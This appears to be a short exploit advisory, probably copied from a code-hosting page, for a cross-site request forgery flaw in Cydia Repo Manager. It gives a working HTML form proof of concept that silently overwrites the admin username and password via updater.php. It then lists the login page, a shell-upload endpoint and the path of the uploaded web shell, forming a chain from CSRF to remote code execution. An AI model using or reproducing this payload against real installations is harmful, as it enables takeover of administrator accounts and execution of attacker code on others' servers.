27 lines
No EOL
908 B
Text
27 lines
No EOL
908 B
Text
# Cydia Repo Manager CSRF Vulnerability
|
|
# By cr4wl3r http://bastardlabs.info
|
|
# http://bastardlabs.info/exploits/Cydia_Repo_Manager.txt
|
|
# Software Link: http://damarist.de/?lang=en
|
|
# Download : http://damar1st.de/downloads/CydiaRepoManager3.1.zip
|
|
# Tested: Win 7
|
|
|
|
Proof of concept:
|
|
|
|
<form method="post" action="http://bastardlabs/[CydiaRepoManager_path]/debs/updater.php">
|
|
<input type="text" name="user" value="Username"/> <br />
|
|
<input type="text" name="pass" value="Password"/><br />
|
|
<input type="submit" name="s" value="w00tw00t!" />
|
|
</form>
|
|
|
|
|
|
Login : http://bastardlabs/[CydiaRepoManager_path]/index.php
|
|
|
|
Upload Shell : http://bastardlabs/[CydiaRepoManager_path]/deb.php
|
|
|
|
Shell : http://bastardlabs/[CydiaRepoManager_path]/downloads/shell.php
|
|
|
|
|
|
Demo :
|
|
http://bastardlabs.info/demo/CydiaRepoManager1.png
|
|
http://bastardlabs.info/demo/CydiaRepoManager2.png
|
|
http://bastardlabs.info/demo/CydiaRepoManager3.png |